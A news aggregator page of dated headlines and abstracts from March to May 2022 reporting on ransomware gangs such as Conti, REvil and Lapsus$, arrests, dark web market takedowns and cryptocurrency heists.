Abstract A 28-year-old Ukrainian national has been sentenced to four years in prison for siphoning thousands of server login credentials and selling them on the dark web for monetary gain as part of a credential theft scheme. Glib Oleksandr Ivanov-Tolpintsev, who pleaded guilty to his offenses earlier this February, was arrested in Poland in October 2020, before being extradited to the U.S. in September 2021. The illegal sale involved the trafficking of login credentials to servers located across the world and personally identifiable information such as dates of birth and Social Security numbers belonging to U.S. residents on a darknet marketplace. The unnamed site purportedly offered over 700,000 compromised servers for sale, including at least 150,000 in the U.S. alone. Believed to have been operational from around October 2014, the underground marketplace was seized by law enforcement authorities on January 24, 2019, according to court documents. This exactly coincides with the dism

The Hacker News


May 14, 2022

These ransomware attackers sent their ransom note to the victim’s printer Full Text

Abstract Researchers have attributed a string of ransomware cyberattacks that took place in early 2022 to an Iranian hacking group they refer to as Cobalt Mirage – also known as APT35, Charming Kitten, Phosphorus, and TA453 by other research groups.

ZDNet


May 13, 2022

New Clues Indicate REvil is All Set for a Comeback Full Text

Abstract The once defunct REvil ransomware is indeed back on the scene as researchers throw light on new developments. The latest version of the malware tracked as 2.08 boasts some key modifications. Organizations must stay ahead of such threats and bolster their defense systems to thwart future ransomware ...

Cyware Alerts - Hacker News


May 11, 2022

Conti’s Wrath Causes Havoc Across the Globe Full Text

Abstract Conti becomes the most wanted cybercriminal gang right now on the dark web with the U.S. announcing a $15 million bounty for information on its members. The group has stirred national security concerns in Costa Rica. Further, Conti claims to have leaked intelligence data from the go ...

Cyware Alerts - Hacker News


May 10, 2022

New REvil Samples Indicate Ransomware Gang is Back After Months of Inactivity Full Text

Abstract The notorious ransomware operation known as REvil (aka Sodin or Sodinokibi) has resumed after six months of inactivity, an analysis of new ransomware samples has revealed. "Analysis of these samples indicates that the developer has access to REvil's source code, reinforcing the likelihood that the threat group has reemerged," researchers from Secureworks Counter Threat Unit (CTU) said in a report published Monday. "The identification of multiple samples with varying modifications in such a short period of time and the lack of an official new version indicates that REvil is under heavy active development once again." REvil, short for Ransomware Evil, is a ransomware-as-a-service (RaaS) scheme and attributed to a Russia-based/speaking group known as Gold Southfield, arising just as GandCrab activity declined and the latter announced their retirement. It's also one of the earliest groups to adopt the double extortion scheme in which stolen data from

The Hacker News


May 10, 2022

Cybercriminals Are Increasingly Exploiting Vulnerabilities in Windows Print Spooler Full Text

Abstract Over the past year, various vulnerabilities in Windows Print Spooler have been discovered. By abusing them, cybercriminals have been able to take control of servers and victims’ machines, even without special admin access.

Dark Reading


May 9, 2022

Emotet is Testing New Attack Chain Full Text

Abstract Proofpoint researchers have spotted low-volume Emotet activity that is much different from typical Emotet threat behaviors, making it highly likely that the group is testing a new threat before using it. The campaign was spotted between April 4 and April 19. The testing of different attack chains is mo ...

Cyware Alerts - Hacker News


May 08, 2022

U.S. Offering $10 Million Reward for Information on Conti Ransomware Hackers Full Text

Abstract The U.S. State Department has announced rewards of up to $10 million for any information leading to the identification of key individuals who are part of the infamous Conti cybercrime gang. Additionally, it's offering another $5 million for intelligence information that could help arrest or convict individuals who are conspiring or attempting to affiliate with the group in a ransomware attack. The department called the Conti variant the "costliest strain of ransomware ever documented." Conti, the work of a Russia-based transnational organized crime group dubbed Gold Ulrick, is one of the most prolific ransomware cartels that has continued to strike entities globally while simultaneously expanding its empire by absorbing TrickBot and running side hustles that involve data extortion. After the syndicate expressed public support for Russia's invasion of Ukraine in February, it suffered a major breach of its own after its source code and internal chats were released

The Hacker News


May 08, 2022

Caramel credit card stealing service is growing in popularity Full Text

Abstract A credit card stealing service is growing in popularity, allowing any low-skilled threat actors an easy and automated way to get started in the world of financial fraud.

BleepingComputer


May 7, 2022

U.S. Offers $15 Million Reward for Information on Conti Ransomware Group Full Text

Abstract The United States State Department has offered a reward of up to $15 million for information on the Russia-based Conti ransomware group, which has been blamed for cyber extortion attacks worldwide.

Reuters


May 04, 2022

Hackers stole data undetected from US, European orgs since 2019 Full Text

Abstract Cybersecurity analysts have exposed a lengthy operation attributed to the group of Chinese hackers known as "Winnti" and tracked as APT41, which focused on stealing intellectual property assets like patents, copyrights, trademarks, and other types of valuable data.

BleepingComputer


May 3, 2022

REvil Ransomware Gang is Back in the Game Full Text

Abstract After reporting its TOR activity weeks ago, researchers claim the return of the REvil group with new infrastructure and an updated malware sample with a modified encryptor for more targeted attacks. It is recommended to keep security shields charged up to fend off such threats. Meanwhile, the publi ...

Cyware Alerts - Hacker News


May 03, 2022

Experts Analyze Conti and Hive Ransomware Gangs’ Chats With Their Victims Full Text

Abstract An analysis of four months of chat logs spanning more than 40 conversations between the operators of Conti and Hive ransomware and their victims has offered an insight into the groups' inner workings and their negotiation techniques. In one exchange, the Conti Team is said to have significantly reduced the ransom demand from a staggering $50 million to $1 million, a 98% drop, suggesting a willingness to settle for a far lower amount. "Both Conti and Hive are quick to lower ransom demands, routinely offering substantial reductions multiple times throughout negotiations," Cisco Talos said in a report shared with The Hacker News. "This signals that despite popular belief, victims of a ransomware attack actually have significant negotiating power." Conti and Hive are among the most prevalent ransomware strains in the threat landscape, cumulatively accounting for 29.1% of attacks detected during the three-month period between October and December 2021. A

The Hacker News


May 02, 2022

Chinese Hackers Caught Exploiting Popular Antivirus Products to Target Telecom Sector Full Text

Abstract A Chinese-aligned cyberespionage group has been observed striking the telecommunication sector in Central Asia with versions of malware such as ShadowPad and PlugX. Cybersecurity firm SentinelOne tied the intrusions to an actor it tracks under the name "Moshen Dragon," with tactical overlaps between the collective and another threat group referred to as Nomad Panda (aka RedFoxtrot). "PlugX and ShadowPad have a well-established history of use among Chinese-speaking threat actors primarily for espionage activity," SentinelOne's Joey Chen said. "Those tools have flexible, modular functionality and are compiled via shellcode to easily bypass traditional endpoint protection products." ShadowPad, labeled a "masterpiece of privately sold malware in Chinese espionage," emerged as a successor to PlugX in 2015, even as variants of the latter have continually popped up as part of different campaigns associated with Chinese threat actors. Alth

The Hacker News


May 2, 2022

The mystery behind the samples of the new REvil ransomware operation Full Text

Abstract The REvil ransomware gang has resumed its operations, experts found a new encryptor and a new attack infrastructure. The REvil ransomware operation shut down in October 2021, in January the Russian Federal Security Service (FSB) announced...

Security Affairs


May 2, 2022

Group-IB CEO remains in prison – the Russian-led company has been ‘blacklisted’ in Italy Full Text

Abstract The latest executive order from the Italian ACN agency banned Group-IB, a Russian-led cybersecurity firm, from working in the government sector. The latest executive order from the Italian National Cybersecurity Agency (NCA) banned Group-IB, a Russian-led...

Security Affairs


May 01, 2022

REvil ransomware returns: New malware sample confirms gang is back Full Text

Abstract The notorious REvil ransomware operation has returned amidst rising tensions between Russia and the USA, with new infrastructure and a modified encryptor allowing for more targeted attacks.

BleepingComputer


April 28, 2022

Bumblebee, a new malware loader used by multiple crimeware threat actors Full Text

Abstract Threat actors have replaced the BazaLoader and IcedID malware with a new loader called Bumblebee in their campaigns. Cybercriminal groups that were previously using the BazaLoader and IcedID as part of their malware campaigns seem to have adopted...

Security Affairs


April 28, 2022

Cybercriminals Using New Malware Loader ‘Bumblebee’ in the Wild Full Text

Abstract Cybercriminal actors previously observed delivering BazaLoader and IcedID as part of their malware campaigns are said to have transitioned to a new loader called Bumblebee that's under active development. "Based on the timing of its appearance in the threat landscape and use by multiple cybercriminal groups, it is likely Bumblebee is, if not a direct replacement for BazaLoader, then a new, multifunctional tool used by actors that historically favored other malware," enterprise security firm Proofpoint said in a report shared with The Hacker News. Campaigns distributing the new highly sophisticated loader are said to have commenced in March 2022, while sharing overlaps with malicious activity leading to the deployment of Conti and Diavol ransomware, raising the possibility that the loader could act as a precursor for ransomware attacks. "Threat actors using Bumblebee are associated with malware payloads that have been linked to follow-on ransomware campaigns,

The Hacker News


April 27, 2022

Ransomware demands are growing, but life is getting tougher for malware gangs Full Text

Abstract Victims of ransomware attacks are paying higher ransoms than ever before, but there are signs that organizations are starting to take heed of cybersecurity advice, making them more resilient to cybercriminals.

ZDNet


April 27, 2022

Conti ransomware operations surge despite the recent leak Full Text

Abstract The Conti ransomware gang continues to target organizations worldwide despite the massive data leak that has shed light on its operations. Researchers from Secureworks state that the Conti ransomware gang, tracked as a Russia-based threat actor Gold Ulrick,...

Security Affairs


April 26, 2022

Stormous ransomware gang claims to have hacked Coca-Cola Full Text

Abstract The Stormous ransomware gang claims to have hacked the multinational beverage corporation Coca-Cola Company. The Stormous ransomware gang announced with a post on its leak site to have hacked the multinational beverage corporation Coca-Cola...

Security Affairs


April 26, 2022

Emotet Operators Use New Delivery Techniques Like OneDrive URLs and XLL Files Full Text

Abstract The activity occurred while Emotet was on a “spring break,” not conducting its typical high volume threat campaigns. The threat actor has since resumed its typical activity.

Proof Point


April 25, 2022

BlackCat Ransomware gang breached over 60 orgs worldwide Full Text

Abstract At least 60 entities worldwide have been breached by BlackCat ransomware, warns a flash report published by the U.S. FBI. The U.S. Federal Bureau of Investigation (FBI) published a flash report that states that at least 60 entities worldwide have...

Security Affairs


April 21, 2022

Cybercriminals Deliver IRS Tax Scams & Phishing Campaigns By Mimicking Government Vendors Full Text

Abstract Cybercriminals purposely choose specific times when all of us are busy with taxes and preparing for holidays (e.g., Easter); that's why you need to be especially careful during these times.

Security Affairs


April 21, 2022

REvil’s Tor Servers are Active Again Full Text

Abstract REvil ransomware’s servers in the Tor network are active again after months of inactivity. At present, these servers are redirecting users to a new operation that is believed to have started in mid-December 2021.

Cyware Alerts - Hacker News


April 20, 2022

REvil’s TOR sites come alive to redirect to new ransomware operation Full Text

Abstract REvil ransomware's servers in the TOR network are back up after months of inactivity and redirect to a new operation that appears to have started since at least mid-December last year.

BleepingComputer


April 19, 2022

Crooks steal $182 million from Beanstalk DeFi platform Full Text

Abstract Credit-based stablecoin protocol Beanstalk discloses a security breach that resulted in the loss of all of its $182 million. The decentralized, credit-based finance system Beanstalk suffered a security breach that resulted in financial losses...

Security Affairs


April 18, 2022

Conti’s Extended Connections with Karakurt Revealed Full Text

Abstract Researchers were able to gain access to an internal Conti VPS server, with the credentials of a user, allegedly the leader of the cybercrime enterprise. This resulted in several revelations about its connection with other groups.

Cyware Alerts - Hacker News


April 18, 2022

Researchers Share In-Depth Analysis of PYSA Ransomware Group Full Text

Abstract An 18-month-long analysis of the PYSA ransomware operation has revealed that the cybercrime cartel followed a five-stage software development cycle from August 2020, with the malware authors prioritizing features to improve the efficiency of its workflows. This included a user-friendly tool like a full-text search engine to facilitate the extraction of metadata and enable the threat actors to find and access victim information quickly. "The group is known to carefully research high-value targets before launching its attacks, compromising enterprise systems and forcing organizations to pay large ransoms to restore their data," Swiss cybersecurity company PRODAFT said in an exhaustive report published last week. PYSA, short for "Protect Your System, Amigo" and a successor of the Mespinoza ransomware, was first observed in December 2019 and has emerged as the third most prevalent ransomware strain detected during the fourth quarter of 2021. Since September 2020,

The Hacker News


April 18, 2022

Experts spotted Industrial Spy, a new stolen data marketplace Full Text

Abstract A new marketplace named Industrial Spy that focuses on the sale of stolen data appeared in the threat landscape. MalwareHunterTeam and Bleeping Computer reported the birth of a new marketplace called Industrial Spy that sells stolen data and offers...

Security Affairs


April 18, 2022

Lazarus Eyes Chemical Sector in South Korea Full Text

Abstract Lazarus, the North Korea-linked APT group, is targeting organizations operating in the chemical sector in South Korea. The campaign seems to be a continuation of Operation Dream Job spotted in August 2020.

Cyware Alerts - Hacker News


April 18, 2022

ZLoader C2 Servers Disrupted in Global Operation Full Text

Abstract Microsoft dismantled ZLoader networks, seizing 65 domains as its C2 servers and 319 additional domains registered using the domain generation algorithm. The botnet is used to target banks worldwide, including Brazil, Australia, and North America, to harvest financial data. It’s critical that privat ...

Cyware Alerts - Hacker News


April 16, 2022

New Industrial Spy stolen data market promoted through cracks, adware Full Text

Abstract Threat actors have launched a new marketplace called Industrial Spy that sells stolen data from breached companies, promoting the site through adware and software cracks.

BleepingComputer


April 16, 2022

Lazarus Group Behind $540 Million Axie Infinity Crypto Hack and Attacks on Chemical Sector Full Text

Abstract The U.S. Treasury Department has implicated the North Korea-backed Lazarus Group (aka Hidden Cobra) in the theft of $540 million from video game Axie Infinity's Ronin Network last month. On Thursday, the Treasury tied the Ethereum wallet address that received the stolen funds to the threat actor and sanctioned the funds by adding the address to the Office of Foreign Assets Control's (OFAC) Specially Designated Nationals (SDN) List. "The FBI, in coordination with Treasury and other U.S. government partners, will continue to expose and combat the DPRK's use of illicit activities – including cybercrime and cryptocurrency theft – to generate revenue for the regime," the intelligence and law enforcement agency said in a statement. The cryptocurrency heist, the second-largest cyber-enabled theft to date, involved the siphoning of 173,600 Ether (ETH) and 25.5 million USD Coins from the Ronin cross-chain bridge, which allows users to transfer their digital as

The Hacker News


April 15, 2022

Haskers Gang Gives Away ZingoStealer Malware to Other Cybercriminals for Free Full Text

Abstract A crimeware-related threat actor known as Haskers Gang has released an information-stealing malware called ZingoStealer for free, allowing other criminal groups to leverage the tool for nefarious purposes. "It features the ability to steal sensitive information from victims and can download additional malware to infected systems," Cisco Talos researchers Edmund Brumaghin and Vanja Svajcer said in a report shared with The Hacker News. "In many cases, this includes the RedLine Stealer and an XMRig-based cryptocurrency mining malware that is internally referred to as 'ZingoMiner.'" But in an interesting twist, the criminal group announced on Thursday that the ownership of the ZingoStealer project is changing hands to a new threat actor, in addition to offering to sell the source code for a negotiable price of $500. Since its inception last month, ZingoStealer is said to be undergoing consistent development and deployed specifically against Russi

The Hacker News


April 15, 2022

Conti Ransomware Gang claims responsibility for the Nordex hack Full Text

Abstract The Conti ransomware gang has claimed responsibility for the recent attack against Nordex, one of the largest manufacturers of wind turbines. The Conti ransomware gang claimed responsibility for the cyberattack that hit the manufacturer of wind turbines...

Security Affairs


April 15, 2022

ZingoStealer crimeware released for free in the cybercrime ecosystem Full Text

Abstract A new powerful crimeware called ZingoStealer was released for free by a threat actor known as Haskers Gang. ZingoStealer is a new information-stealer developed by a threat actor known as Haskers Gang who released it for free after they attempted...

Security Affairs


April 15, 2022

North Korea’s Lazarus Group Stole More than $600 Million in a Single Hack Targeting Axie Infinity Full Text

Abstract The FBI has blamed hackers associated with the North Korean government for stealing more than $600 million in cryptocurrency last month from a video gaming company -- the latest in a string of audacious cyber heists tied to Pyongyang.

CNN Money


April 15, 2022

Karakurt revealed as data extortion arm of Conti cybercrime syndicate Full Text

Abstract After breaching servers managed by the cybercriminals, security researchers found a connection between Conti ransomware and the recently emerged Karakurt data extortion group, showing that the two gangs are part of the same operation.

BleepingComputer


April 14, 2022

Instagram’s dark side: sexual harassers, crypto scammers, ID thieves Full Text

Abstract A platform for everyone to seamlessly share their best moments online, Instagram is slowly turning into a mecca for the undesirables—from sexual harassers to crypto "investors" helping you "get rich fast." How do you keep yourself safe against such profiles?

BleepingComputer


April 14, 2022

Haskers Gang Introduces New ZingoStealer Malware for Free to Target Gamers Full Text

Abstract This information stealer, first introduced to the wild in March 2022, is currently undergoing active development and multiple releases of new versions have been observed recently.

Cisco Talos


April 13, 2022

FBI, Europol Seize RaidForums Hacker Forum and Arrest Admin Full Text

Abstract An international law enforcement operation raided and took down RaidForums, one of the world's largest hacking forums notorious for selling access to hacked personal information belonging to users. Dubbed Tourniquet, the seizure of the cybercrime website involved authorities from the U.S., U.K., Sweden, Portugal, and Romania, with the criminal investigation resulting in the arrest of the forum's administrator at his home last month in Croydon, England. The three confiscated domains associated with the illicit marketplace include "raidforums[.]com," "Rf[.]ws," and "Raid[.]lol." Diogo Santos Coelho (aka "Omnipotent"), the said founder and chief administrator, was apprehended in the U.K. on January 31 and is pending extradition to the U.S. Santos Coelho has been charged with conspiracy, access device fraud, and aggravated identity theft. In addition to detailing Santos Coelho's central role in designing and administering the soft

The Hacker News


April 12, 2022

Ethereum dev imprisoned for helping North Korea evade sanctions Full Text

Abstract Virgil Griffith, a US cryptocurrency expert, was sentenced on Tuesday to 63 months in prison after pleading guilty to assisting the Democratic People's Republic of Korea (DPRK) with technical info on how to evade sanctions.

BleepingComputer


April 12, 2022

Operation TOURNIQUET: Authorities shut down dark web marketplace RaidForums Full Text

Abstract The dark web marketplace RaidForums has been shut down and its infrastructure seized as a result of Operation TOURNIQUET. The illegal dark web marketplace RaidForums has been shut down and its infrastructure seized as a result of the international...

Security Affairs


April 12, 2022

RaidForums hacking forum seized by police, owner arrested Full Text

Abstract The RaidForums hacker forum, used mainly for trading and selling stolen databases, has been shut down and its domain seized by U.S. law enforcement during Operation TOURNIQUET, an action coordinated by Europol that involved law enforcement agencies in several countries.

BleepingComputer


April 12, 2022

LockBit ransomware gang lurked in a U.S. gov network for months Full Text

Abstract Threat analysts have found evidence of malicious actors using the LockBit ransomware strain lingering in the network of a regional U.S. government agency for at least five months.

BleepingComputer


April 8, 2022

Looking Inside Pandora’s Box Full Text

Abstract The threat group uses the double extortion method to increase pressure on the victim. This means that they not only encrypt the victim’s files, but also exfiltrate them and threaten to release the data if the victim does not pay.

Fortinet


April 06, 2022

U.S. sanctions crypto-exchange Garantex for aiding Hydra Market Full Text

Abstract The U.S. Department of the Treasury's Office has announced sanctions against the cryptocurrency exchange Garantex, which has been linked to illegal transactions for Hydra Market.

BleepingComputer


April 05, 2022

Germany Shuts Down Russian Hydra Darknet Market; Seizes $25 Million in Bitcoin Full Text

Abstract Germany's Federal Criminal Police Office, the Bundeskriminalamt (BKA), on Tuesday announced the official takedown of Hydra, the world's largest illegal dark web marketplace that has cumulatively facilitated over $5 billion in Bitcoin transactions to date. "Bitcoins amounting to currently the equivalent of approximately €23 million were seized, which are attributed to the marketplace," the BKA said in a press release. Blockchain analytics firm Elliptic confirmed that the seizure occurred on April 5, 2022 in a series of 88 transactions amounting to 543.3 BTC. The agency attributed the shutdown of Hydra to an extensive investigation operation conducted by its Central Office for Combating Cybercrime (ZIT) in partnership with U.S. law enforcement authorities since August 2021. Launched in 2015, Hydra was a Russian-language darknet marketplace that opened as a competitor to the now-defunct Russian Anonymous Marketplace (aka RAMP), primarily known for its high-traffic

The Hacker News


April 2, 2022

UK Police charges two teenagers for their alleged role in the Lapsus$ extortion group Full Text

Abstract The City of London Police charged two of the seven teenagers who were arrested for their alleged role in the LAPSUS$ data extortion gang. The duo has been released on bail after appearing in the Highbury Corner Magistrates' Court on Friday. The...

Security Affairs


March 30, 2022

Conti Continues To Attack Even After Recent Code Leaks Full Text

Abstract Researchers have spotted an updated version of Conti ransomware as part of the global ransomware tracking efforts that allow it to reboot and encrypt the targeted system in Safe Mode. To avoid detection, Conti uses the Murmur3 hashing algorithm, which produces different hash values for all API func ...

Cyware Alerts - Hacker News


March 30, 2022

Lapsus$ extortion gang claims to have hacked IT Giant Globant Full Text

Abstract The Lapsus$ extortion group claims to have hacked IT giant Globant and leaked tens of gigabytes of stolen data. The Lapsus$ extortion group claims to have hacked IT giant Globant and leaked roughly 70 Gb of stolen data. The gang claims that the company...

Security Affairs


March 30, 2022

FBI disrupts BEC cybercrime gangs targeting victims worldwide Full Text

Abstract A coordinated operation conducted by the FBI and its international law enforcement partners has resulted in disrupting business email compromise (BEC) schemes in several countries.

BleepingComputer


March 29, 2022

Hackers Steal Over $600 Million from Axie Infinity Developer’s Ronin Bridge Full Text

Abstract The Ronin bridge and Katana Dex have been halted after suffering an exploit for 173,600 Ethereum (ETH) and 25.5 million USD Coin (USDC), worth a combined $612 million at Tuesday's prices.

Coin Telegraph


March 29, 2022

Europol dismantles massive call center investment scam operation Full Text

Abstract Europol has announced the arrest of 108 people suspected of being involved in an international call center operation that tricked victims into investment scams.

BleepingComputer


March 28, 2022

Of Cybercriminals and IP Addresses Full Text

Abstract You don't like having the FBI knocking on your door at 6 am in the morning. Surprisingly, nor does your usual cybercriminal. That is why they hide (at least the good ones), for example, behind layers of proxies, VPNs, or TOR nodes. Their IP address will never be exposed directly to the target's machine. Cybercriminals will always use third-party IP addresses to deliver their attacks. There are countless ways to deliver cyberattacks. But one thing is common to all of them. The need for a pool of IP addresses to serve as a medium. Criminals need IP addresses to deliver distributed denial of service attacks. Criminals need IP addresses to hide behind when probing services. Criminals need IP addresses to attempt brute force attacks. Criminals need IP addresses to run bot networks and services. In a nutshell, criminals need to maintain IP addresses under their control for pretty much anything. It is their most important asset and is the ammo they need to deliver attacks. So how

The Hacker News


March 25, 2022

7 Suspected Members of LAPSUS$ Hacker Gang, Aged 16 to 21, Arrested in U.K. Full Text

Abstract The City of London Police has arrested seven teenagers between the ages of 16 and 21 for their alleged connections to the prolific LAPSUS$ extortion gang that's linked to a recent burst of attacks targeting NVIDIA, Samsung, Ubisoft, LG, Microsoft, and Okta. "The City of London Police has been conducting an investigation with its partners into members of a hacking group," Detective Inspector Michael O'Sullivan said in a statement shared with The Hacker News. "Seven people between the ages of 16 and 21 have been arrested in connection with this investigation and have all been released under investigation. Our enquiries remain ongoing." The development, which was first disclosed by BBC News, comes after a report from Bloomberg revealed that a 16-year-old Oxford-based teenager is the mastermind of the group. It's not immediately clear if the minor is one among the arrested individuals. The said teen, under the online alias White or Breachbase, is al

The Hacker News


March 25, 2022

UK police arrested 7 alleged members of Lapsus$ extortion gang Full Text

Abstract UK police suspect that a 16-year-old from Oxford is one of the leaders of the popular Lapsus$ extortion group. The City of London Police announced that it has arrested seven teenagers suspected of being members of the notorious Lapsus$ extortion gang,...

Security Affairs


March 24, 2022

23-Year-Old Russian Hacker Wanted by FBI for Running Marketplace of Stolen Logins Full Text

Abstract A 23-year-old Russian national has been indicted in the U.S. and added to the Federal Bureau of Investigation's (FBI) Cyber Most Wanted List for his alleged role as the administrator of Marketplace A, a cyber crime forum that sold stolen login credentials, personal information, and credit card data. Igor Dekhtyarchuk, who first appeared in hacker forums in 2013 under the alias "floraby," has been accused of charges of wire fraud, access device fraud, and aggravated identity theft, a set of offenses that could lead to up to 20 years in federal prison. According to the FBI's Wanted poster, Dekhtyarchuk previously studied at the Ural State University in Yekaterinburg, Russia, and was last known to reside in the city of Kamensk-Uralsky. "Marketplace A specialized in the sale of unlawfully obtained access devices for compromised online payment platforms, retailers, and credit card accounts, including providing the data associated with those accounts such as na

The Hacker News


March 24, 2022

Alleged Microsoft, Okta hackers arrested in UK Full Text

Abstract British authorities arrested seven individuals on Thursday suspected of hacking major tech companies including Okta and Microsoft, according to Reuters.

The Hill


March 24, 2022

Lapsus$ suspects arrested for Microsoft, Nvidia, Okta hacks Full Text

Abstract As Lapsus$ data extortion gang announced that several of its members are taking a vacation, the City of London Police say they have arrested seven individuals connected to the gang.

BleepingComputer


March 24, 2022

This is how much the average Conti hacking group member earns a month Full Text

Abstract According to findings by Secureworks, the average Conti ransomware group member earns a salary of $1,800 per month, a figure you might consider low considering the success of the criminal gang.

ZDNet


March 23, 2022

FBI adds Russian cybercrime market owner to most wanted list Full Text

Abstract A Russian national has been indicted by the US DOJ and added to the FBI's Cyber Most Wanted list for allegedly creating and managing a cybercrime marketplace.

BleepingComputer


March 23, 2022

It’s official, Lapsus$ gang compromised a Microsoft employee’s account Full Text

Abstract Microsoft confirmed that Lapsus$ extortion group has hacked one of its employees to access and steal the source code of some projects. Microsoft confirmed that Lapsus$ extortion group has hacked one of its employees to access and steal the source...

Security Affairs


March 22, 2022

Lapsus$ Data Kidnappers Claim Snatches From Microsoft, Okta Full Text

Abstract Lapsus$ shared screenshots of internal Okta systems and 40Gb of purportedly stolen Microsoft data on Bing, Bing Maps and Cortana.

Threatpost


March 22, 2022

BlackMatter Affiliates Propagate BlackCat Ransomware Full Text

Abstract Researchers analyzed two recent ransomware attacks by BlackCat and BlackMatter and discovered overlaps in their TTPs. However, a BlackCat representative had already claimed that the ransomware is not a rebranding of BlackMatter. BlackCat could be playing an important role in helping ...

Cyware Alerts - Hacker News


March 22, 2022

Lapsus$ extortion gang claims to have stolen sensitive data from Okta Full Text

Abstract The Lapsus$ extortion group claims to have stolen sensitive data from identity and access management giant Okta. The gang announced the alleged hack through its Telegram channel and shared a series of screenshots as proof of the hack....

Security Affairs


March 21, 2022

Lapsus$ gang claims to have hacked Microsoft source code repositories Full Text

Abstract Microsoft is investigating claims that the Lapsus$ hacking group breached its internal Azure DevOps source code repositories.

Security Affairs


March 19, 2022

Avoslocker ransomware gang targets US critical infrastructure Full Text

Abstract The Federal Bureau of Investigation (FBI) reported that AvosLocker ransomware is being used in attacks targeting US critical infrastructure. The FBI published a joint cybersecurity advisory warning of AvosLocker...

Security Affairs


March 19, 2022

Crooks claim to have stolen 4TB of data from TransUnion South Africa Full Text

Abstract TransUnion South Africa disclosed a data breach; the threat actors who stole the sensitive data demanded a ransom payment in exchange for not releasing it. TransUnion South Africa announced that threat actors compromised a company server based in South Africa...

Security Affairs


March 19, 2022

Exotic Lily initial access broker works with Conti gang Full Text

Abstract Google's Threat Analysis Group (TAG) uncovered a new initial access broker, named Exotic Lily, that is closely affiliated with the Conti ransomware gang.

Security Affairs


March 18, 2022

Experts Find Some Affiliates of BlackMatter Now Spreading BlackCat Ransomware Full Text

Abstract An analysis of two ransomware attacks has identified overlaps in the tactics, techniques, and procedures (TTPs) between BlackCat and BlackMatter, indicating a strong connection between the two groups. While it's typical of ransomware groups to rebrand their operations in response to increased visibility into their attacks, BlackCat (aka Alphv) marks a new frontier in that the cyber crime cartel is built out of affiliates of other ransomware-as-a-service (RaaS) operations. BlackCat first emerged in November 2021 and has since targeted several organizations worldwide over the past few months. It has been called out for being similar to BlackMatter, a short-lived ransomware family that originated from DarkSide, which attracted notoriety for its high-profile attack on Colonial Pipeline in May 2021. In an interview with Recorded Future's The Record last month, a BlackCat representative dismissed rumors that it's a rebranding of BlackMatter, while noting that it

The Hacker News


March 18, 2022

Google Uncovers ‘Initial Access Broker’ Working with Conti Ransomware Gang Full Text

Abstract Google's Threat Analysis Group (TAG) took the wraps off a new initial access broker that it said is closely affiliated to a Russian cyber crime gang notorious for its Conti and Diavol ransomware operations. Dubbed Exotic Lily, the financially motivated threat actor has been observed exploiting a now-patched critical flaw in the Microsoft Windows MSHTML platform (CVE-2021-40444) as part of widespread phishing campaigns that involved sending no fewer than 5,000 business proposal-themed emails a day to 650 targeted organizations globally. "Initial access brokers are the opportunistic locksmiths of the security world, and it's a full-time job," TAG researcher Vlad Stolyarov said. "These groups specialize in breaching a target in order to open the doors — or the Windows — to the malicious actor with the highest bid." Exotic Lily, first spotted in September 2021, is said to have been involved in data exfiltration and deployment of th

The Hacker News


March 17, 2022

Google exposes tactics of a Conti ransomware access broker Full Text

Abstract Google's Threat Analysis Group has exposed the operations of a threat actor group dubbed "EXOTIC LILY," an initial access broker linked to the Conti and Diavol ransomware operations.

BleepingComputer


March 17, 2022

Ukraine SBU arrested a hacker who supported Russia during the invasion Full Text

Abstract The Security Service of Ukraine (SBU) announced the arrest of a "hacker" who provided technical support to Russian troops during the invasion.

Security Affairs


March 17, 2022

Ukraine Secret Service Arrests Hacker Helping Russian Invaders Full Text

Abstract The Security Service of Ukraine (SBU) said it has detained a "hacker" who offered technical assistance to the invading Russian troops by providing mobile communication services inside the Ukrainian territory. The anonymous suspect is said to have broadcasted text messages to Ukrainian officials, including security officers and civil servants, proposing that they surrender and take the side of Russia. The individual has also been accused of routing phone calls from Russia to the mobile phones of Russian troops in Ukraine. "Up to a thousand calls were made through this hacker in one day. Many of them are from the top leadership of the enemy army," the SBU alleged, adding it confiscated the equipment that was used to pull off the operation. Besides implicating the hacker for helping Russia make anonymous phone calls to its military forces based in Ukraine, the agency said the hacker passed commands and instructions to different groups of "Russian invaders."

The Hacker News


March 17, 2022

Lapsus$ gang sends a worrying message to would-be criminals Full Text

Abstract The Lapsus$ cyber-crime gang, believed to be based in Brazil, until recently was best known for attacks on that country's Ministry of Health and Portuguese media outlets SIC Noticias and Expresso.

The Register


March 14, 2022

Russian Ransomware Gang Retool Custom Hacking Tools of Other APT Groups Full Text

Abstract A Russian-speaking ransomware outfit likely targeted an unnamed entity in the gambling and gaming sector in Europe and Central America by repurposing custom tools developed by other APT groups like Iran's MuddyWater, new research has found. The unusual attack chain involved the abuse of stolen credentials to gain unauthorized access to the victim network, ultimately leading to the deployment of Cobalt Strike payloads on compromised assets, said Felipe Duarte and Ido Naor, researchers at Israeli incident response firm Security Joes, in a report published last week. Although the infection was contained at this stage, the researchers characterized the compromise as a case of a suspected ransomware attack. The intrusion is said to have taken place in February 2022, with the attackers making use of post-exploitation tools such as ADFind, NetScan, SoftPerfect, and LaZagne. Also employed is an AccountRestore executable to brute-force administrator credentials and a forked ver

The Hacker News


March 11, 2022

LockBit ransomware gang claims attack on Bridgestone Americas Full Text

Abstract A cyberattack on Bridgestone Americas, one of the largest manufacturers of tires in the world, has been claimed by the LockBit ransomware gang.

BleepingComputer


March 11, 2022

Lapsus$ Ransomware Group is hiring, it announced recruitment of insiders Full Text

Abstract The Lapsus$ ransomware gang is looking for insiders willing to sell remote access to major technology corporations and ISPs. On Thursday, March 10, the Lapsus$ ransomware gang announced that it is starting to recruit insiders employed within major technology giants...

Security Affairs


March 10, 2022

REvil ransomware member extradited to U.S. to stand trial for Kaseya attack Full Text

Abstract The U.S. Department of Justice announced that alleged REvil ransomware affiliate, Yaroslav Vasinskyi, was extradited to the United States last week to stand trial for the Kaseya cyberattack.

BleepingComputer


March 01, 2022

TrickBot Malware Gang Upgrades its AnchorDNS Backdoor to AnchorMail Full Text

